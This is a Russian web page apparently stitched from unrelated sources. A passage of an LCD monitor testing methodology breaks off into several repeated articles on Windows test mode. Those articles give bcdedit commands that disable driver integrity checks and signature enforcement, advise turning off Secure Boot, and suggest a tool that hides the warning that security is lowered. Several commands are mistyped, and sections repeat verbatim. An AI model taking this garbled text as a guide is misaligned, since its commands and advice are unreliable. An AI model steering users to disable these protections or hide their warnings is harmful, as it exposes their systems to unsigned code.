Яркость. Яркость напрямую зависит от источника подсветки ЖК-матрицы. Как правило, этот параметр измеряется в канделах на квадратный метр при условии «абсолютно белой» ЖК-матрицы (все триады полностью открыты, яркость и контрастность настроены на максимум). Для обычных трубок характерны значения около 270–400, для ЖК-матриц — примерно 150–250. Еще один параметр, влияющий на яркость, — особенности внутренней конструкции матрицы. Например, два транзистора на цветовую составляющую, характерные для уже упомянутой технологии «XtraView», существенно снижают коэффициент пропускания открытых элементов матрицы, требуя более яркой подсветки. Измерить яркость нам не представилось возможным, мы приводим указанные в документации цифры и сообщаем наши субъективные впечатления.

Равномерность. Равномерность подсветки определяется как степень разброса яркости по поверхности ЖК-матрицы. Источники подсветки современных матриц по своей природе не являются равномерно излучающими поверхностями. Широкий параллельный поток света формируется посредством специальной плоской призмы, закрепленной сзади матрицы, сверху и снизу которой находятся один или два трубчатых источника белого света. Разумеется, в такой ситуации невозможно добиться подсветки, полностью равномерной по всей поверхности ЖК-матрицы. Но, как и в случае других критических параметров, ухищрения инженеров позволили значительно снизить неравномерность подсветки. У современных ЖК-матриц она доставляет существенно меньше неудобств, нежели, например, углы обзора.

Частота обновления (инертность). У пассивных ЖК-матриц этот параметр остается болезненно низким (от 3 до 10 Гц, что недостаточно для большинства мультимедийных и игровых применений), но активные могут обеспечить полную смену изображения с частотой до 40 Гц. Этого вполне достаточно для большинства применений, но ЭЛТ все же существенно быстрее.

Мертвые точки. В активной ЖК-матрице каждой составляющей в триаде (RGB) управляет собственный тонкопленочный транзистор. Их количество огромно: для 15-дюймовой матрицы — 1024х768х3=2359296. Технологически очень тяжело произвести матрицу без бракованных транзисторов, поэтому, дабы не завышать чрезмерно и без того высокую стоимость ЖК-мониторов, производители допускают наличие нескольких бракованных транзисторов, и, как следствие, несколько вечно погашенных или наоборот, включенных точек. Их называют «мертвыми». Приглядевшись, можно найти мертвые точки практически у любого ЖК-монитора. Причем, что самое интересное, политика различных производителей по отношению к мертвым точкам может быть совершенно различной. Один гарантирует «не более X на площади четверть или менее от всей поверхности», другой обещает «не более Y вообще» и меняет монитор, если это не так, а третий просто «рассматривает каждый вопрос индивидуально», то есть вообще ничего не обещает. Число мертвых точек, несомненно, подвластно случаю. Но, как и печально известные нити трубок Sony Trinitron, они могут сильно раздражать некоторых пользователей. Мы не считали число мертвых точек у конкретных экземпляров исследуемых нами ЖК-мониторов.

Цветопередача. Существенной проблемой ЖК-мониторов является неаккуратная цветопередача. В силу конструктивных особенностей классическая ЖК-матрица способна адекватно передавать 6–7 бит на составляющую цвета, что достаточно только для деловых (офисных) применений. В последнее время передовые производители ЖК-матриц разработали несколько методик, обеспечивающих более точное соответствие (8 бит на составляющую). Hitachi, например, для этой цели использует несколько сканирований с различными значениями подаваемого к общему электроду напряжения. Кроме того, урон цветопередаче наносят искажения, связанные с зависимостью цвета от угла обзора, и качество подсветки.

Мы оценивали цветопередачу на корректированых нашими дизайнерами фотосюжетах, хорошо известных человеческому глазу: пучке салата, веточках вишневого дерева и мимозы, облаке в контровом солнечном свете, отражении огней ночного города от речной глади. В меню некоторых мониторов предусмотрена установка точности цветопередачи: 6 или 8 бит на RGB-составляющую (соответственно 256K или 16М цветов). Мы оценивали этот параметр по шкале с 256 градациями серого. Для оценки передачи пастельных тонов мы использовали несколько специальных изображений с цветовыми переливами.

Функциональные параметры

Регулировки и память режимов. ЖК-монитору требуется значительно меньше настроек геометрии изображения, нежели электронно-лучевому. Регулировка необходима главным образом яркости и контрастности, положению по вертикали и горизонтали. Очень важна подстройка частоты синхронизации и фазы — параметров, позволяющих точно посадить передаваемые видеокартой по аналоговому VGA-интерфейсу точки на отведенные им места. Практически все мониторы имеют функцию автоматической подстройки изображения по частоте, фазе, размеру, позиции — все сразу или, реже, по отдельности. Можно ожидать такого сервиса, как цифровая регулировка громкости и тембра встроенных динамиков или выбор режима масштабирования низких разрешений. Точная настройка цветовой температуры и раздельная регулировка баланса трех цветов вполне могут найти практическое применение, в том числе и для ручной коррекции цветопередачи. Мы постарались отразить в очерках очевидные недостатки или преимущества набора регулировок.

Реализация поддержки режимов. Как уже указывалось, ЖК-мониторы дают оптимальное изображение на минимально возможной частоте кадровой развертки. Там, где это не оговорено отдельно, мы использовали частоту 60 или 75 Гц. Некоторые пользователи считают нужным устанавливать частоту развертки порядка 85 Гц или более, основываясь на опыте работы со стандартными мониторами, но ЖК-монитор от этого ничуть не выигрывает.

Нужно помнить, что 18,1-дюймовые ЖК-мониторы имеют иное, нежели у 15-дюймовых, отношение сторон: 1280/1024=1,25 — в то время как для остальных режимов 1024/768=800/600=640/480=1,3(3). Показывая режимы с меньшим разрешением, эти мониторы либо растягивают изображение на весь экран, жертвуя правильными пропорциями, либо оставляют узкие полосы сверху и снизу изображения. У продвинутых моделей стратегия поведения в такой ситуации может быть выбрана в меню.

Автоподстройка изображения. Практически все ЖК-мониторы имеют функцию автоподстройки, обеспечивающую регулировку всех геометрических параметров изображения без вмешательства пользователя, но качество реализации этой функции сильно зависит от производителя. Мы сравнивали основное тестовое изображение Display Mate в штатном разрешении монитора, настроенном как вручную, так и автоматически. Хотя функция автоподстройки сильно зависит от самого изображения, мы тестировали ее работу только на геометрической контрольной сетке DM и случайно организованном «рабочем столе» Windows, который, скорее всего, и будет использоваться для этой цели большинством пользователей. После этого с помощью специальных муаровых сеток и лупы проверялась точность посадки пикселей и, если требовалось, проводилась дополнительная ручная коррекция.

Физические параметры

Покрытие и прочность поверхности панели. Антибликовое покрытие, повышающее контрастность, есть практически на всех современных матрицах. Мы отмечали мониторы, отличавшиеся особенно чувствительной к нажатию или, наоборот, более прочной, чем остальные, матрицей. По понятной причине мы не смогли позволить себе какие-либо «крэш»- или «царап»-тесты.

Вес и размер. Эти параметры, казалось бы, в случае ЖК-мониторов можно уменьшать беспредельно. В действительности же малый вес приводит к неустойчивости, а излишне тонкая конструкция корпуса панели не обеспечит жесткости и механической защиты матрице. Следует уделять внимание разумному балансу этих характеристик параметров.

Углы поворота. Положение панели монитора относительно подставки должно регулироваться. Вопрос в том, как это может быть сделано, на какие углы и в каких направлениях. Как правило, доступен наклон вверх-вниз и поворот вправо-влево. Иногда производители балуют возможностью подъема экрана по вертикали или поворота основания подставки.

Портретный режим. У некоторых мониторов экран поворачивается на 90 градусов. Подобный режим работы удобен для просмотра Web-страниц и верстки, но не стоит забывать, что физическая конструкция матрицы не меняется и изображение, передаваемое видеокартой, так же должно быть повернуто на 90 градусов. Для этого используется специальное программное обеспечение, как правило, прилагаемое к монитору. К сожалению, это обеспечение не всегда корректно работает с некоторыми драйверами видеокарт. Более того, ускорители, рассчитанные на классическое для человечества заполнение слева направо и сверху вниз, здорово сдают в производительности, вынужденные рисовать все под прямым углом. Вплоть до невозможности комфортно работать в полноцветных режимах. Учитывая несомненную популярность и мощность используемой нами видеокарты, мы посчитали явным недостатком неспособность программы портретного режима нормально с ней работать.

Потребляемая энергия и режим энергосбережения. Количество потребляемой в нормальном режиме энергии не является столь важным параметром для рядового отечественного пользователя. Особенно сумевшего подобный ЖК-монитор приобрести. Под занавес теста нам показалось странным, что ЖК-мониторы используют главным образом внешние импульсные источники питания, такие небольшие, что могли бы уместиться в подставке любой модели.

Эргономические параметры

Органы управления и функциональность меню. Органы управления — первое, что бросается в глаза, а точнее в руки, как только вы включаете монитор. Важны удобство и оперативность доступа к настройкам, интуитивная ясность, что с этими самыми органами управления делать. Например, очень удобно когда у ЖК-монитора есть отдельная кнопка автоподстройки. Больше всего перманентного неудобства пользователю могут доставить явные огрехи в качестве изображения и неудобные органы управления. Посему следует уделить этим вещам наибольшее количество своего внимания.

Дизайн. Ну, и последний пункт — на радость глаз. Глаз собственных, глаз ваших знакомых или посетителей. Приятно порой чем-нибудь окружающих.

Acer View F51

На рабочем столе тестовый режим. Включение и выключение тестового режима Windows

В процессе работы за компьютером иногда возникают ситуации (например при подключении Android-устройств для их перепрошивки) когда требуется установить специфичные и неподписанные драйвера оборудования. В данном случае лучше всего воспользоваться тестовым режимом Windows. Рассмотрим этот вопрос подробнее.

Включаем тестовый режим в командной строке Windows

Чтобы переход в тестовый режим прошел успешно, необходимо прежде всего выключить режим «Secure Boot (Безопасная загрузка)» в BIOS, поэтому перед началом необходимо зайти в вашего компьютера. Для различных производителей материнских плат настройки будут несколько отличаться, мы же разберемся как отключать «Secure Boot» на примере имеющегося у нас компьютера с материнской платой Asus.

Итак: запускаем BIOS (UEFI) и заходим в раздел «Загрузка». В нем переходим к пункту «Безопасная загрузка» и щелкаем его мышкой.

Появляется небольшое меню «Тип ОС», в котором выбираем пункт «Другие ОС».

Сохраняем параметры и перегружаемся. Если в меню вашего БИОС отсутствует пункт «Безопасная загрузка», значит он уже отключен на аппаратном уровне и вышеописанные действия производить не нужно.

Теперь можно запустить «десятку» в тестовом режиме, чтобы снять некоторые ограничения ОС, в частности те, которые накладываются при инсталляции неподписанных драйверов. Запускаем (с администраторскими правами), вводим команду:

bcdedit.exe -set loadoptions DISABLE_INTEGRITY_CHECKS

bcdedit . exe set TESTSIGNING ON

Ждем окончания выполнения каждой из команд, после которого система выдаст соответствующее уведомление.

Закрываем окно, перегружаемся. После перезагрузки рядом с панелью уведомлений увидим надпись, напоминающую о режиме, в котором теперь работает операционная система.

Отключить тестовый режим можно аналогичным способом, только синтаксис команды будет немножко другим:

bcdedit . exe set TESTSIGNING OFF

Многие пользователи ПК сталкиваются с такой проблемой как тестовый режим в Windows 10. Отключить это надоедливое сообщение, висящее на экране, под силу далеко не каждому. Но данное руководство поможет вам в этом нелегком деле. Здесь вы узнаете не только основной способ устранения проблемы, но еще и дополнительный, больше подходящий пользователям, не желающим рисковать.

Причины возникновения неполадки

Перед тем, как отключить тестовый режим в Windows 10 Pro (или любой другой редакции «Десятки»), нужно разобраться в причинах возникновения этой неисправности. Чаще всего такое случается, если:

  • Вы вручную отключили систему контроля цифровой подписи драйверов.
  • При установке какой-либо программы вы согласились на активацию тестового режима.
  • Во время работы операционной системы, или же при ее очередном обновлении, произошел какой-то сбой.

Кроме того, ошибка часто возникает при использовании пиратской «Виндовс». В нелицензионных версиях может быть несколько причин включения тестового режима, начиная от проверки подписи драйверов, отключенной по умолчанию, и заканчивая измененными системными файлами. В общем, мало ли что пираты там «подкрутили».

Последствия

Даже если вы не знаете, как отключить тестовый режим в Windows 10, то никаких серьезных последствий от этого не будет. Компьютер продолжит нормально функционировать. Единственное, чем будет отличаться «тестовая» операционная система от обычной, — это соответствующая надпись внизу рабочего стола.

А вот если вы все-таки решили пойти на такой шаг, как отключение тестового режима в Windows 10, тогда у вас могут возникнуть определенные неприятности. Дело в том, что некоторые программы и устройства используют для своей работы неподписанные драйвера. Они, в свою очередь, перестанут нормально функционировать после деактивации тестового режима, от чего могут возникнуть проблемы.

Основной способ

Вы можете, воспользовавшись командной строкой, отключить тестовый режим в Windows 10. Этот метод рекомендован сотрудниками Microsoft, так что он считается основным. Чтобы воспользоваться им, выполните следующее:

  • Войдите в командную строку.
  • Впишите «bcdedit.exe» затем нажмите пробел и допишите «-set TESTSIGNING OFF».
  • Подтвердите изменения и дождитесь завершения операции.

Перезапустите PC. Если вы все сделали правильно, система прекратит работать в тестовом режиме и, соответственно, надпись исчезнет с рабочего стола.

Использование специальной программы

Так как отключение тестового режима в Windows 10 иногда может привести к негативным последствиям, вы можете не рисковать и воспользоваться альтернативным методом. Для этого будет использована утилита UWD, которая как раз и служит для убирания всевозможных надписей с рабочего стола. Чтобы воспользоваться приложением:

  • Установите программу и запустите ее.
  • Нажмите кнопку «Install», подтвердите вносимые изменения и дождитесь окончания операции.
  • Программа попросит вас перезагрузить ПК. Сделайте это и дождитесь включения вашего компьютера.

В том случае, если вы все сделали верно, надоедливая надпись исчезнет с вашего рабочего стола. Обратите внимание, что UWD не отключает тестовый режим, а лишь скрывает сообщение о его использовании.

Изначально «семерка» настроена таким образом, что не допускает к установке неподписанные драйвера. Это специальная защита системы. Убирается она в случае активации тестового режима Win 7.

Настройка тестового режима

Тестовый режим Виндовс 7 может включиться в результате установки какого-либо ПО, в инсталлятор которого встроен соответствующий скрипт. Рядовой пользователь легко заметит изменение в системе по надписи снизу экрана. Она небольших размеров, но все равно серьезно отвлекает.

В таком случае потребуется деактивация этой функции.

Но бывают и обратные ситуации, например, когда нужно поставить пользовательский софт. А сделать это невозможно без активации работы с неподписанными драйверами.

Отключение

Всех, кому мешает надпись на рабочем столе, заинтересует способ, как отключить тестовый режим в Windows 7. Делается это из Командной строки. Для ее запуска откройте «Пуск» , в полном списке найдите раздел «Стандартные» , там располагается нужный пункт. Нажмите по нему ПКМ, а затем «Запуск от…» .

В текстовом поле с мигающим курсором пропишите запрос bcdedit.exe -set loadoptions ENABLE_INTEGRITY_CHECKS , а затем нажмите Enter, после чего — bcdedit.exe -set TESTSIGNING OFF


Примечание: вставить текст не получится, нужно вбивать его вручную с клавиатуры.

Остается только перезагрузить систему.

Важно: если открыть командную строку без администраторских прав, то ввод команды будет сопровождаться сообщением «Отказано в доступе» . Это говорит о том, что вы пропустили пункт «Запуск от…» .

Активация

Активация тестового режима необходима для установки неподписанных драйверов, например, разработанных пользователями, которые требуются для синхронизации какого-либо устройства с компьютером. Но бывают и другие причины, при которых понадобится данная функция.

Вновь запустите Командную строку по инструкции из прошлого раздела. Опять активируйте первый запрос. Отобразится уведомление об успешности, затем пропишите bcdedit.exe -set TESTSIGNING ON

Аппаратная конфигурация компьютеров, на которые устанавливается Windows, может существенно отличаться по целому ряду параметров, как могут разниться между собой и сами версии и редакции ОС. Именно по этой причине создаваемые под Windows приложения должны быть универсальными в плане совместимости. Так оно обычно и бывает, однако существуют софт, для запуска которого требуется особый режим, называемый режимом тестирования.

Что такое тестовый режим и когда он активируется

Тестовый режим Windows 10 можно условно назвать состоянием «лояльности» системы к программному обеспечению, не имеющему соответствующих электронных подписей. В таком режиме система понижает уровень безопасности, что позволяет администратору устанавливать нестабильное ПО. Кроме того, на 64-битных системах появляется возможность обходить определенные ограничения безопасности.

В обычных условиях режим тестирования, как правило, сам собой не активируется. Для его включения требуется соответствующее действие пользователя или сторонней программы. О том, что Виндовс работает в Test Mode, со всей ясностью говорит надпись «Тестовый режим Windows 10…» в правом нижнем углу монитора. Сам же режим вступает в силу в случае отключения юзером в загрузочном меню либо намеренного его включения с помощью штатной консольной тулзы bcdedit или сторонней утилиты Driver Signature Enforcement Overrider .

Текстовая ватемарка в углу рабочего стола может появиться, хотя и не сразу, в модифицированных сборках Windows, если автор решил деактивировать некоторые функции верификации. Также логотипом могут быть отмечены инсайдерские сборки системы, выпускаемые Microsoft. Ниже мы покажем, как выйти из тестового режима Windows 10, но для начала посмотрим, как скрыть с экрана назойливое сообщение, указывающее на его активность.

Как удалить надпись «Тестовый режим»

Если используете Test Mode на постоянной основе, рано или поздно уведомляющий текст рядом с системным лотком начнет вам надоедать и, скорее всего, вы захотите от него избавиться. Но как убрать надпись «Тестовый режим» в Windows 10 в правом нижнем углу не выходя из самого режима? Очень даже легко, достаточно лишь воспользоваться маленькой портативной утилитой Universal Watermark Disabler , найти которую без проблем можно на просторах интернета. Запустите ее, нажмите кнопку «Install» и подтвердите действие.

При этом работа Проводника будет завершена, экран станет черным, сессия пользователя автоматически завершится, но когда вы зайдете в систему повторно, то увидите, что раздражающая надпись около системного трея исчезла. Если же через некоторое время вы захотите ее вернуть, программу нужно запустить повторно и на этот раз нажать кнопку «Uninstall».

В новейших сборках Windows 10 корректность работы Universal Watermark Disabler не гарантируется, например, в Windows 10 16299 утилита выдала ошибку «Сбой при удаленном вызове процедуры», что, однако, не помешало ей благополучно скрыть надпись. Тем не менее, этот способ является наиболее универсальным.

Пользователями Windows 10 предлагались также и другие способы избавления от логотипа, в частности, манипуляции с файлами в каталоге %userprofile%/AppData/Roaming/Microsoft/Windows/Themes . Но как показала практика, такие действия редко приводят к желаемому результату, либо их успешность носит временный характер.

Как отключить тестовый режим совсем

Ну что же, теперь настала пора узнать, как выключить тестовый режим Windows 10 вообще. Делается это очень просто с помощью консольного инструмента bcdedit.exe . Приведенный здесь способ работает не только в актуальной десятой версии Виндовс, но и в «восьмерке», и в «семерке». Запустите с привилегиями администратора командую строку либо консоль PowerShell и выполните в ней команду bcdedit.exe -set testsigning off , а затем перезапустите машину. Готово, режим тестирования деактивируется, а уведомляющий текст в системном трее исчезнет.

Есть, правда, малая вероятность, что отключить тестовый режим Windows 10 так сразу не удастся. Если после выполнения команды вы обнаружите, что ватемарка по-прежнему «украшает» нижний правый угол десктопа, вернитесь к консоли и выполните в ней сначала bcdedit.exe -set loadoptions enable_integrity_checks , а затем повторите команду, указанную в абзаце выше.

На сей раз тестовый режим должен полностью отключиться, равно как должен исчезнуть с экрана и его водяной знак.

Рекомендуем также

Как убрать надпись тестовый режим. Включение и выключение тестового режима Windows

Изначально «семерка» настроена таким образом, что не допускает к установке неподписанные драйвера. Это специальная защита системы. Убирается она в случае активации тестового режима Win 7.

Настройка тестового режима

Тестовый режим Виндовс 7 может включиться в результате установки какого-либо ПО, в инсталлятор которого встроен соответствующий скрипт. Рядовой пользователь легко заметит изменение в системе по надписи снизу экрана. Она небольших размеров, но все равно серьезно отвлекает.

В таком случае потребуется деактивация этой функции.

Но бывают и обратные ситуации, например, когда нужно поставить пользовательский софт. А сделать это невозможно без активации работы с неподписанными драйверами.

Отключение

Всех, кому мешает надпись на рабочем столе, заинтересует способ, как отключить тестовый режим в Windows 7. Делается это из Командной строки. Для ее запуска откройте «Пуск» , в полном списке найдите раздел «Стандартные» , там располагается нужный пункт. Нажмите по нему ПКМ, а затем «Запуск от…» .

В текстовом поле с мигающим курсором пропишите запрос bcdedit.exe -set loadoptions ENABLE_INTEGRITY_CHECKS , а затем нажмите Enter, после чего — bcdedit.exe -set TESTSIGNING OFF


Примечание: вставить текст не получится, нужно вбивать его вручную с клавиатуры.

Остается только перезагрузить систему.

Важно: если открыть командную строку без администраторских прав, то ввод команды будет сопровождаться сообщением «Отказано в доступе» . Это говорит о том, что вы пропустили пункт «Запуск от…» .

Активация

Активация тестового режима необходима для установки неподписанных драйверов, например, разработанных пользователями, которые требуются для синхронизации какого-либо устройства с компьютером. Но бывают и другие причины, при которых понадобится данная функция.

Вновь запустите Командную строку по инструкции из прошлого раздела. Опять активируйте первый запрос. Отобразится уведомление об успешности, затем пропишите bcdedit.exe -set TESTSIGNING ON

Некоторые пользователи операционной системы Windows 10 обнаруживают на своем рабочем столе загадочную надпись «Тестовый режим». Эта надпись находится в правом нижнем углу экрана и сообщает о том, что система работает в тестовом режиме.

Тестовый режим – это режим в котором операционная система Windows 10 позволяет пользователям устанавливать и использовать драйверы, не подписанные компанией Microsoft. Обычно данный режим используют разработчики программного обеспечения. Если у вас вдруг включился такой режим, то вы можете его отключить либо просто убрать надпись «Тестовый режим» с рабочего стола.

Отключение тестового режима в Windows 10

Для того, чтобы отключить тестовый режим в Windows 10 вам понадобится . Открыть ее можно по-разному, самый надежный способ, который сработает в любом случае, это поиск в меню Пуск. Для этого откройте меню «Пуск», введите в поиск команду «cmd», после чего кликните правой кнопкой мышки по найденной программе и выберите «Запустить от имени администратора».

После этого перед вами должна появиться «Командная строка». В заголовке окна должна быть надпись «Администратор», которая указывает на то, что «Командная строка» запущена с правами администратора.

Теперь можно приступать к отключению тестового режима Windows 10. Для этого нужно просто выполнить команду «bcdedit.exe -set TESTSIGNING OFF » и перезагрузить компьютер.

После выполнения данной команды и перезагрузки компьютера надпись «Тестовый режим» должна исчезнуть с рабочего стола.

Как убрать надпись «Тестовый режим» с рабочего стола

Если вам нужно не отключить тестовый режим, а просто убрать надпись «Тестовый режим» с рабочего стола, то это можно сделать при помощи бесплатной программы Universal Watermark Disabler. Данная программа предназначена для удаления различных водяных знаков в операционных системах Windows 8, Windows 8.1 и Windows 10. Разработчик заявляет, что программа работает во всех сборках Windows начиная с Windows 8 build 7850.

Для того, чтобы скрыть надпись «Тестовый режим» при помощи программы Universal Watermark Disabler , установите и запустите на своем компьютере. После запуска данной программы вы увидите небольшое окно с кнопкой «Install».

Нажмите на эту кнопку и подтвердите использование программы нажатием на кнопку «ОК». После этого ваш компьютер перезагрузится, а надпись «Тестовый режим» исчезнет с рабочего стола.

Вы не являетесь разработчиком или не проводите тестирования программных продуктов, драйверов или других элементов ПО, но у вас появилась надпись: «Тестовый режим» и номер сборки? Такое бывает, если вы нечаянно, при установке какой-то программы, выбрали разрешения на переход в тестовый режим, в который вошли после перезагрузки компьютера. Давайте разберем – как отключить тестовый режим в windows 7 и избавиться от надоедливой надписи в нижнем правом углу рабочего стола.

Возможно, переход в тестовый режим у вас осуществился после установки программы небольшого размера под названием OpenedFilesView. Когда она устанавливается, инсталлятор задает вопрос «Перейти ли в тестовый режим?» и пользователь, считая это бесполезным действием, соглашается. Когда система перезагрузилась, появилось следующее:

Как оказалось, проблема, если ее можно так назвать, решается достаточно легко. Все уже запомнили, что мы много раз в своих статьях использовали утилиту «Выполнить» — этот случай не исключение. Итак, переходим туда с помощью Win+R и вводим такую команду: bcdedit.exe -setTESTSIGNINGOFF.

После нажатия на «Ок» и перезагрузки, система выйдет из тестового режима. Но помните, если вам когда-то понадобится его включить обратно, нужно будет совершить те же действия, но вместо OFF использоватьON. Теперь вы убедились, что отключить тестовый режим windows 7 очень просто.

Похожие записи

Бывает отлучишься от компьютера, а потом приходишь, но он уже выключен. Начинаются нервные крики, паника от потерянной информации или важных документов, которые не были сохранены. Чтобы этого не было, необходимо узнать, как отключить спящий…

Пользователи персонального компьютера, которые имеют операционные системы 7, 8, 8.1 или 10 могут в процессе эксплуатации увидеть такого типа сообщения на мониторе: «Программа запущена в режиме совместимости». Многие, особенно неопытные, в…

Аппаратная конфигурация компьютеров, на которые устанавливается Windows, может существенно отличаться по целому ряду параметров, как могут разниться между собой и сами версии и редакции ОС. Именно по этой причине создаваемые под Windows приложения должны быть универсальными в плане совместимости. Так оно обычно и бывает, однако существуют софт, для запуска которого требуется особый режим, называемый режимом тестирования.

Что такое тестовый режим и когда он активируется

Тестовый режим Windows 10 можно условно назвать состоянием «лояльности» системы к программному обеспечению, не имеющему соответствующих электронных подписей. В таком режиме система понижает уровень безопасности, что позволяет администратору устанавливать нестабильное ПО. Кроме того, на 64-битных системах появляется возможность обходить определенные ограничения безопасности.

В обычных условиях режим тестирования, как правило, сам собой не активируется. Для его включения требуется соответствующее действие пользователя или сторонней программы. О том, что Виндовс работает в Test Mode, со всей ясностью говорит надпись «Тестовый режим Windows 10…» в правом нижнем углу монитора. Сам же режим вступает в силу в случае отключения юзером в загрузочном меню либо намеренного его включения с помощью штатной консольной тулзы bcdedit или сторонней утилиты Driver Signature Enforcement Overrider .

Текстовая ватемарка в углу рабочего стола может появиться, хотя и не сразу, в модифицированных сборках Windows, если автор решил деактивировать некоторые функции верификации. Также логотипом могут быть отмечены инсайдерские сборки системы, выпускаемые Microsoft. Ниже мы покажем, как выйти из тестового режима Windows 10, но для начала посмотрим, как скрыть с экрана назойливое сообщение, указывающее на его активность.

Как удалить надпись «Тестовый режим»

Если используете Test Mode на постоянной основе, рано или поздно уведомляющий текст рядом с системным лотком начнет вам надоедать и, скорее всего, вы захотите от него избавиться. Но как убрать надпись «Тестовый режим» в Windows 10 в правом нижнем углу не выходя из самого режима? Очень даже легко, достаточно лишь воспользоваться маленькой портативной утилитой Universal Watermark Disabler , найти которую без проблем можно на просторах интернета. Запустите ее, нажмите кнопку «Install» и подтвердите действие.

При этом работа Проводника будет завершена, экран станет черным, сессия пользователя автоматически завершится, но когда вы зайдете в систему повторно, то увидите, что раздражающая надпись около системного трея исчезла. Если же через некоторое время вы захотите ее вернуть, программу нужно запустить повторно и на этот раз нажать кнопку «Uninstall».

В новейших сборках Windows 10 корректность работы Universal Watermark Disabler не гарантируется, например, в Windows 10 16299 утилита выдала ошибку «Сбой при удаленном вызове процедуры», что, однако, не помешало ей благополучно скрыть надпись. Тем не менее, этот способ является наиболее универсальным.

Пользователями Windows 10 предлагались также и другие способы избавления от логотипа, в частности, манипуляции с файлами в каталоге %userprofile%/AppData/Roaming/Microsoft/Windows/Themes . Но как показала практика, такие действия редко приводят к желаемому результату, либо их успешность носит временный характер.

Как отключить тестовый режим совсем

Ну что же, теперь настала пора узнать, как выключить тестовый режим Windows 10 вообще. Делается это очень просто с помощью консольного инструмента bcdedit.exe . Приведенный здесь способ работает не только в актуальной десятой версии Виндовс, но и в «восьмерке», и в «семерке». Запустите с привилегиями администратора командую строку либо консоль PowerShell и выполните в ней команду bcdedit.exe -set testsigning off , а затем перезапустите машину. Готово, режим тестирования деактивируется, а уведомляющий текст в системном трее исчезнет.

Есть, правда, малая вероятность, что отключить тестовый режим Windows 10 так сразу не удастся. Если после выполнения команды вы обнаружите, что ватемарка по-прежнему «украшает» нижний правый угол десктопа, вернитесь к консоли и выполните в ней сначала bcdedit.exe -set loadoptions enable_integrity_checks , а затем повторите команду, указанную в абзаце выше.

На сей раз тестовый режим должен полностью отключиться, равно как должен исчезнуть с экрана и его водяной знак.

Выйти из тестового режима. Включение и выключение тестового режима Windows

Аппаратная конфигурация компьютеров, на которые устанавливается Windows, может существенно отличаться по целому ряду параметров, как могут разниться между собой и сами версии и редакции ОС. Именно по этой причине создаваемые под Windows приложения должны быть универсальными в плане совместимости. Так оно обычно и бывает, однако существуют софт, для запуска которого требуется особый режим, называемый режимом тестирования.

Что такое тестовый режим и когда он активируется

Тестовый режим Windows 10 можно условно назвать состоянием «лояльности» системы к программному обеспечению, не имеющему соответствующих электронных подписей. В таком режиме система понижает уровень безопасности, что позволяет администратору устанавливать нестабильное ПО. Кроме того, на 64-битных системах появляется возможность обходить определенные ограничения безопасности.

В обычных условиях режим тестирования, как правило, сам собой не активируется. Для его включения требуется соответствующее действие пользователя или сторонней программы. О том, что Виндовс работает в Test Mode, со всей ясностью говорит надпись «Тестовый режим Windows 10…» в правом нижнем углу монитора. Сам же режим вступает в силу в случае отключения юзером в загрузочном меню либо намеренного его включения с помощью штатной консольной тулзы bcdedit или сторонней утилиты Driver Signature Enforcement Overrider .

Текстовая ватемарка в углу рабочего стола может появиться, хотя и не сразу, в модифицированных сборках Windows, если автор решил деактивировать некоторые функции верификации. Также логотипом могут быть отмечены инсайдерские сборки системы, выпускаемые Microsoft. Ниже мы покажем, как выйти из тестового режима Windows 10, но для начала посмотрим, как скрыть с экрана назойливое сообщение, указывающее на его активность.

Как удалить надпись «Тестовый режим»

Если используете Test Mode на постоянной основе, рано или поздно уведомляющий текст рядом с системным лотком начнет вам надоедать и, скорее всего, вы захотите от него избавиться. Но как убрать надпись «Тестовый режим» в Windows 10 в правом нижнем углу не выходя из самого режима? Очень даже легко, достаточно лишь воспользоваться маленькой портативной утилитой Universal Watermark Disabler , найти которую без проблем можно на просторах интернета. Запустите ее, нажмите кнопку «Install» и подтвердите действие.

При этом работа Проводника будет завершена, экран станет черным, сессия пользователя автоматически завершится, но когда вы зайдете в систему повторно, то увидите, что раздражающая надпись около системного трея исчезла. Если же через некоторое время вы захотите ее вернуть, программу нужно запустить повторно и на этот раз нажать кнопку «Uninstall».

В новейших сборках Windows 10 корректность работы Universal Watermark Disabler не гарантируется, например, в Windows 10 16299 утилита выдала ошибку «Сбой при удаленном вызове процедуры», что, однако, не помешало ей благополучно скрыть надпись. Тем не менее, этот способ является наиболее универсальным.

Пользователями Windows 10 предлагались также и другие способы избавления от логотипа, в частности, манипуляции с файлами в каталоге %userprofile%/AppData/Roaming/Microsoft/Windows/Themes . Но как показала практика, такие действия редко приводят к желаемому результату, либо их успешность носит временный характер.

Как отключить тестовый режим совсем

Ну что же, теперь настала пора узнать, как выключить тестовый режим Windows 10 вообще. Делается это очень просто с помощью консольного инструмента bcdedit.exe . Приведенный здесь способ работает не только в актуальной десятой версии Виндовс, но и в «восьмерке», и в «семерке». Запустите с привилегиями администратора командую строку либо консоль PowerShell и выполните в ней команду bcdedit.exe -set testsigning off , а затем перезапустите машину. Готово, режим тестирования деактивируется, а уведомляющий текст в системном трее исчезнет.

Есть, правда, малая вероятность, что отключить тестовый режим Windows 10 так сразу не удастся. Если после выполнения команды вы обнаружите, что ватемарка по-прежнему «украшает» нижний правый угол десктопа, вернитесь к консоли и выполните в ней сначала bcdedit.exe -set loadoptions enable_integrity_checks , а затем повторите команду, указанную в абзаце выше.

На сей раз тестовый режим должен полностью отключиться, равно как должен исчезнуть с экрана и его водяной знак.

Иногда пользователи сталкиваются с тем, что в нижней части экрана появляется надпись, которая гласит, что система запущена в тестовом режиме. При этом там же содержится информация о редакции и номере сборки. Конечно же, пользователям хочется убрать эту надпись как можно быстрее.

Тестовый режим обычно говорит о том, что в системе отключена проверка цифровых подписей для драйверов, такая же ошибка может появляться в самостоятельных сборках, в которых заблокирована та или иная функция виндовс. Таким образом, можно сказать, что в тестовом режиме отключены некоторые функции безопасности, что позволяет устанавливать непроверенные программы.

Для включения можно открыть командную строку (win+r и ввести cmd) и написать оператор bcdedit.exe -set TESTSIGNING ON/

Отключение через командную строку

Для отключения режима также можно воспользоваться командной строкой, которую следует запустить от имени администратора . Сделать это можно щелкнув правой кнопкой по пуску и выбрав нужный пункт. Дальше останется только ввести и выполнить оператор bcdedit.exe -set TESTSIGNING OFF .

В некоторых случаях, команда может не выполниться. В этом случае потребуется перезагрузить компьютер, при новом включении потребуется зайти в БИОС или uefi, сделать это можно нажимая при старте f2 или del. Здесь следует отыскать функцию под названием secure boot и выключить ее. После этого можно снова запускать систему и применять команду, когда все будет закончено, опцию снова можно будет включить.

